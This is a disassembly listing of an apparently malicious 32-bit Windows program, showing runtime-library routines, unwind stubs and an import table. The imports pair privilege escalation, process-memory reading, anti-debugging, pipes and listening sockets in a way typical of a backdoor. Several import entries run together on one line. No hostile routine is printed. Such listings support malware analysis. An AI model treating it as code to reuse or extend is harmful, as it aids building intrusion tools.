; sub_436034+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_436234
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_43622E: ; CODE XREF: sub_436034+86�j
mov [esi+0Ah], ax
jmp short loc_43624F
; ---------------------------------------------------------------------------
loc_436234: ; CODE XREF: sub_436034+42�j
; sub_436034+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_43624F: ; CODE XREF: sub_436034+AB�j
; sub_436034+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_436034 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436254 proc near ; CODE XREF: sub_435381+440�p
; sub_435852+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_453D70
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_4362CD
jge short loc_43627C
mov eax, [ebp+arg_4]
mov ebx, offset dword_453ED0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_43627C: ; CODE XREF: sub_436254+16�j
cmp [ebp+arg_8], ecx
jnz short loc_436287
mov eax, [ebp+arg_0]
mov [eax], cx
loc_436287: ; CODE XREF: sub_436254+2B�j
cmp [ebp+arg_4], ecx
jz short loc_4362CD
push esi
push edi
loc_43628E: ; CODE XREF: sub_436254+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_4362C6
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_4362B9
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_4362B9: ; CODE XREF: sub_436254+57�j
push esi
push [ebp+arg_0]
call sub_436034
pop ecx
pop ecx
xor ecx, ecx
loc_4362C6: ; CODE XREF: sub_436254+49�j
cmp [ebp+arg_4], ecx
jnz short loc_43628E
pop edi
pop esi
loc_4362CD: ; CODE XREF: sub_436254+14�j
; sub_436254+36�j
pop ebx
leave
retn
sub_436254 endp
; =============== S U B R O U T I N E =======================================
sub_4362D0 proc near ; CODE XREF: sub_4279FA+21�p
; sub_435F6C+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_4362F7
push esi
call sub_4293A0
inc eax
push eax
call sub_4297B8
pop ecx
test eax, eax
pop ecx
jz short loc_4362F7
push esi
push eax
call sub_42A5D0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4362F7: ; CODE XREF: sub_4362D0+7�j
; sub_4362D0+1A�j
xor eax, eax
pop esi
retn
sub_4362D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_436300 proc near ; CODE XREF: sub_42ACCC+13�p
; sub_42B527+23�p
jmp dword_437230
sub_436300 endp
; ---------------------------------------------------------------------------
align 4
push dword ptr [ebp-10h]
call sub_4290D0
pop ecx
retn
; ---------------------------------------------------------------------------
loc_436312: ; DATA XREF: sub_4155AA�o
mov eax, offset dword_438120
jmp loc_42B576
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_436324: ; DATA XREF: sub_41985D�o
mov eax, offset dword_438144
jmp loc_42B576
; ---------------------------------------------------------------------------
align 10h
loc_436330: ; DATA XREF: .text:0043816C�o
lea ecx, [ebp-24h]
jmp sub_41B19E
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_41968F
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
and eax, 1
test eax, eax
jz locret_436356
mov ecx, [ebp+8]
jmp sub_41968F
; ---------------------------------------------------------------------------
locret_436356: ; CODE XREF: .text:00436348�j
retn
; ---------------------------------------------------------------------------
loc_436357: ; DATA XREF: sub_419913�o
mov eax, offset dword_438178
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_43636C: ; DATA XREF: sub_419B11�o
mov eax, offset dword_43819C
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_436380: ; DATA XREF: .text:004381C4�o
lea ecx, [ebp-3Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_436388: ; DATA XREF: .text:004381CC�o
lea ecx, [ebp-3Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_436390: ; DATA XREF: .text:004381D4�o
lea ecx, [ebp-5Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_4363A8: ; DATA XREF: .text:004381EC�o
lea ecx, [ebp-3Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_4363B8: ; DATA XREF: .text:004381FC�o
lea ecx, [ebp-3Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_4363D0: ; DATA XREF: .text:00438214�o
lea ecx, [ebp-3Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_4363E8: ; DATA XREF: .text:0043822C�o
lea ecx, [ebp-4Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_4363F8: ; DATA XREF: .text:0043823C�o
lea ecx, [ebp-4Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_436400: ; DATA XREF: .text:00438244�o
lea ecx, [ebp-2Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-5Ch]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_436418: ; DATA XREF: sub_419C4E�o
mov eax, offset dword_438258
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1F4h]
jmp sub_41B173
; ---------------------------------------------------------------------------
loc_43642F: ; DATA XREF: .text:00438280�o
lea ecx, [ebp-30h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-0CCh]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-0ACh]
jmp sub_41B173
; ---------------------------------------------------------------------------
lea ecx, [ebp-0F0h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-0BCh]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-394h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-374h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-204h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-384h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-110h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-304h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-244h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-264h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-160h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-170h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-3A4h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-140h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-344h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-2C4h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-2E4h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E0h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-1A0h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-234h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-130h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-274h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-254h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-294h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-150h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-190h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-2D4h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-120h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-314h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-2F4h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-334h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-100h]
jmp sub_41968F
; ---------------------------------------------------------------------------
lea ecx, [ebp-180h]
jmp sub_41968F
; ---------------------------------------------------------------------------
loc_4365D0: ; DATA XREF: .text:loc_41A08B�o
mov eax, offset dword_4383F4
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_41B418
; ---------------------------------------------------------------------------
loc_4365E4: ; DATA XREF: sub_41B1F5�o
mov eax, offset dword_43848C
jmp loc_42B576
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-14h]
jmp sub_42BA1B
; ---------------------------------------------------------------------------
loc_4365F8: ; DATA XREF: sub_41B24F�o
mov eax, offset dword_4384B0
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_42BA1B
; ---------------------------------------------------------------------------
loc_43660C: ; DATA XREF: sub_41B2D9�o
mov eax, offset dword_4384F0
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_42BA1B
; ---------------------------------------------------------------------------
loc_436620: ; DATA XREF: sub_41B332�o
mov eax, offset dword_438514
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_42BA1B
; ---------------------------------------------------------------------------
loc_436634: ; DATA XREF: sub_41B38A�o
mov eax, offset dword_438538
jmp loc_42B576
; ---------------------------------------------------------------------------
align 10h
loc_436640: ; DATA XREF: sub_41B812�o
mov eax, offset dword_438588
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1Ch]
jmp sub_420245
; ---------------------------------------------------------------------------
loc_436654: ; DATA XREF: sub_41F876�o
mov eax, offset dword_4385AC
jmp loc_42B576
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-10h]
jmp loc_426D16
; ---------------------------------------------------------------------------
loc_436668: ; DATA XREF: .text:004385D4�o
lea ecx, [ebp-20h]
jmp loc_426D16
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_426D16
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_426D16
; ---------------------------------------------------------------------------
loc_436680: ; DATA XREF: sub_423C7A�o
mov eax, offset dword_4385E8
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_41B418
; ---------------------------------------------------------------------------
loc_436694: ; DATA XREF: sub_4290DB�o
mov eax, offset dword_438648
jmp loc_42B576
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
jmp sub_42BA1B
; ---------------------------------------------------------------------------
loc_4366A8: ; DATA XREF: sub_429135�o
mov eax, offset dword_438670
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_41B418
; ---------------------------------------------------------------------------
loc_4366BC: ; DATA XREF: sub_4291C3�o
mov eax, offset dword_438698
jmp loc_42B576
; ---------------------------------------------------------------------------
align 4
dd 24Eh dup(0)
dword_437000 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_424D65+139�r ...
dword_437004 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_424D65+58�r ...
dword_437008 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_43700C dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameAdword_437010 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessToken ; sub_424EAB+4E�r
dword_437014 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueAdword_437018 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_43701C dd 77DF08D5h ; resolved to->ADVAPI32.GetSecurityInfodword_437020 dd 77E215D9h ; resolved to->ADVAPI32.SetEntriesInAclAdword_437024 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_437028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_425092+88�r ...
align 10h
dword_437030 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_409EE2+20�r ...
dword_437034 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_409EE2+F�r ...
dword_437038 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_424984+1A�r
dword_43703C dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_422335+95�r ...
dword_437040 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFile ; sub_402A3D+43�r ...
dword_437044 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_402A0E+1A�r ...
dword_437048 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFile ; sub_402A3D+69�r ...
dword_43704C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_41E7BE+83�r ...
dword_437050 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_40A9FE+B9E�r ...
dword_437054 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_42352C+6B�r
dword_437058 dd 7C8312E5h ; resolved to->KERNEL32.TransactNamedPipe ; sub_4066E2+125�r ...
dword_43705C dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_405C99+B8�r ...
dword_437060 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_40A9FE+4C31�r ...
dword_437064 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_40541D+3D0�r ...
dword_437068 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_40541D+51F�r ...
dword_43706C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_40541D+508�r ...
dword_437070 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_40A7C5+24�r ...
dword_437074 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_430D9F+20D�r ...
dword_437078 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_405C99+2E7�r ...
dword_43707C dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_40A9FE+29EA�r ...
dword_437080 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_437084 dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_405C99+613�r ...
dword_437088 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_4079AA+477�r ...
dword_43708C dd 7C8217ACh ; resolved to->KERNEL32.CreateDirectoryA ; sub_4079AA+275�r
dword_437090 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_40A9FE+1B2D�r ...
dword_437094 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_437098 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_41BE01+247�r
dword_43709C dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameAdword_4370A0 dd 7C8643B5h ; resolved to->KERNEL32.Module32Nextdword_4370A4 dd 7C864230h ; resolved to->KERNEL32.Module32Firstdword_4370A8 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_4370AC dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessIddword_4370B0 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4370B4 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40A9FE+A95�r ...
dword_4370B8 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathA ; sub_427C81+17�r
dword_4370BC dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_42F91D+2A�r
dword_4370C0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_4370C4 dd 7C835E8Fh ; resolved to->KERNEL32.MoveFileAdword_4370C8 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingA ; sub_42521F+A7�r ...
dword_4370CC dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_42C1D4+28�r ...
dword_4370D0 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_418FA1+D0�r ...
dword_4370D4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_4182BA+687�r ...
dword_4370D8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_4182BA+62E�r ...
dword_4370DC dd 7C8024A7h ; resolved to->KERNEL32.ReleaseMutex ; sub_427DAA+89�r
dword_4370E0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4370E4 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExAdword_4370E8 dd 7C81F992h ; resolved to->KERNEL32.GlobalMemoryStatusExdword_4370EC dd 7C83632Dh ; resolved to->KERNEL32.GetTimeFormatAdword_4370F0 dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatAdword_4370F4 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_42045F+3BA�r
dword_4370F8 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_41D475+2F�r ...
dword_4370FC dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_423C7A+3B7�r ...
dword_437100 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcess ; sub_43482B+1B9�r
dword_437104 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_437108 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_43710C dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipedword_437110 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_437114 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_41EFEF+82�r ...
dword_437118 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_41FE3F+1A0�r ...
dword_43711C dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_437120 dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_437124 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThread ; sub_42003C+1C�r
dword_437128 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_43712C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_437130 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_437134 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_437138 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_43713C dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTime ; sub_42A7D5+D�r
dword_437140 dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_437144 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_42810F+107�r
dword_437148 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_43714C dd 7C85B219h ; resolved to->KERNEL32.RemoveDirectoryAdword_437150 dd 7C812D9Fh ; resolved to->KERNEL32.TlsAllocdword_437154 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; sub_42E4EE+45�r
dword_437158 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_42DAEF+3D�r ...
dword_43715C dd 7C809E79h ; resolved to->KERNEL32.IsBadWritePtrdword_437160 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_431C83+14F�r ...
dword_437164 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_42C226+28�r ...
dword_437168 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_402459+206�r ...
dword_43716C dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_437170 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_4051EF:loc_4052F5�r ...
dword_437174 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_402675+1A7�r ...
dword_437178 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiA ; sub_402CE9+27F�r ...
dword_43717C dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_4032D2+1F�r ...
dword_437180 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_402459+14C�r ...
dword_437184 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40535C+16�r ...
dword_437188 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401A77+2�r ...
dword_43718C dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_418FA1+DB�r ...
dword_437190 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401B6E+2AB�r ...
dword_437194 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_42D008+51�r ...
dword_437198 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree ; sub_42D3F9+120�r ...
dword_43719C dd 7C833478h ; resolved to->KERNEL32.SetEnvironmentVariableAdword_4371A0 dd 7C80A35Eh ; resolved to->KERNEL32.CompareStringW ; sub_435AE5+261�r
dword_4371A4 dd 7C80D077h ; resolved to->KERNEL32.CompareStringA ; sub_435AE5+B9�r
dword_4371A8 dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_4371AC dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_4371B0 dd 7C809E01h ; resolved to->KERNEL32.IsBadReadPtrdword_4371B4 dd 7C812641h ; resolved to->KERNEL32.FlushFileBuffersdword_4371B8 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_4334DD+12D�r
dword_4371BC dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_4334DD+8D�r
dword_4371C0 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4371C4 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_432F35+E1�r
dword_4371C8 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4371CC dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4371D0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4371D4 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_4371D8 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_43291B+14�r ...
dword_4371DC dd 7C81DC03h ; resolved to->KERNEL32.SetStdHandle ; sub_43235A:loc_4323B0�r
dword_4371E0 dd 7C84467Dh ; resolved to->KERNEL32.SetUnhandledExceptionFilter ; sub_4320F7+6�r
dword_4371E4 dd 7C9109EDh ; resolved to->NTDLL.RtlSizeHeapdword_4371E8 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_430D9F+14D�r ...
dword_4371EC dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_430D9F+A7�r
dword_4371F0 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4371F4 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_42F6FC+17A�r ...
dword_4371F8 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_4371FC dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_437200 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_4330A0+143�r
dword_437204 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_437208 dd 7C809740h ; resolved to->KERNEL32.TlsGetValue ; sub_42E555+18�r
dword_43720C dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Errordword_437210 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_42B39A+F6�r ...
dword_437214 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_42C925+2C5�r ...
dword_437218 dd 7C8350BFh ; resolved to->KERNEL32.GetTimeZoneInformation ; sub_4339B6+4E�r
dword_43721C dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTimedword_437220 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_42AF20+53�r ...
dword_437224 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_42AF20+44�r ...
dword_437228 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_43722C dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValue ; sub_42E487+2E�r ...
dword_437230 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_437234 dd 7C812A09h ; resolved to->KERNEL32.RaiseException ; sub_42FCB4+215�r
dword_437238 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_42F6FC+5E�r
dword_43723C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_437240 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_437244 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableA dd 0
dword_43724C dd 71B2517Fh dd 0
dword_437254 dd 7712A63Fh dd 0
dword_43725C dd 7CA40EE0h ; sub_41EA30+28�r ...
dword_437260 dd 7CAB8CB2h ; sub_42245D+4D�r
align 8
dword_437268 dd 7E44F209h ; resolved to->USER32.IsCharAlphaNumericA ; sub_423919+2CB�r ...
dword_43726C dd 7E42E5C2h ; resolved to->USER32.CharLowerAdword_437270 dd 7E42F420h ; resolved to->USER32.GetClassNameA ; sub_426C45+19�r
dword_437274 dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_426C45+7D�r
dword_437278 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_415641+2C�r ...
align 10h
dword_437280 dd 76A08017h align 8
dword_437288 dd 71AC0BDEh ; resolved to->WS2_32.shutdowndword_43728C dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_4225E4+C2�r ...
dword_437290 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_41DD09+A6�r ...
dword_437294 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_41DE6E+31D�r ...
dword_437298 dd 71AB3E00h ; resolved to->WS2_32.binddword_43729C dd 71AB951Eh ; resolved to->WS2_32.getsocknamedword_4372A0 dd 71AB88D3h ; resolved to->WS2_32.listendword_4372A4 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_40A9FE+8409�r ...
dword_4372A8 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_41F0F5+E2�r ...
dword_4372AC dd 71AB4428h ; resolved to->WS2_32.WSACleanupdword_4372B0 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_4372B4 dd 71AC1028h ; resolved to->WS2_32.acceptdword_4372B8 dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_4073A2+19�r ...
dword_4372BC dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4066E2+48�r ...
dword_4372C0 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_409FC8+33�r ...
dword_4372C4 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_404525+29C�r ...
dword_4372C8 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_4225E4+7B�r ...
dword_4372CC dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_404525+2AD�r ...
dword_4372D0 dd 71AB428Ah ; resolved to->WS2_32.send ; .text:00404032�r ...
dword_4372D4 dd 71AB615Ah ; resolved to->WS2_32.recv ; .text:00404107�r ...
dword_4372D8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; .text:0040411C�r ...
dword_4372DC dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_4225E4+CD�r ...
dword_4372E0 dd 71AB50C8h ; resolved to->WS2_32.gethostname ; sub_426D23+16�r ...
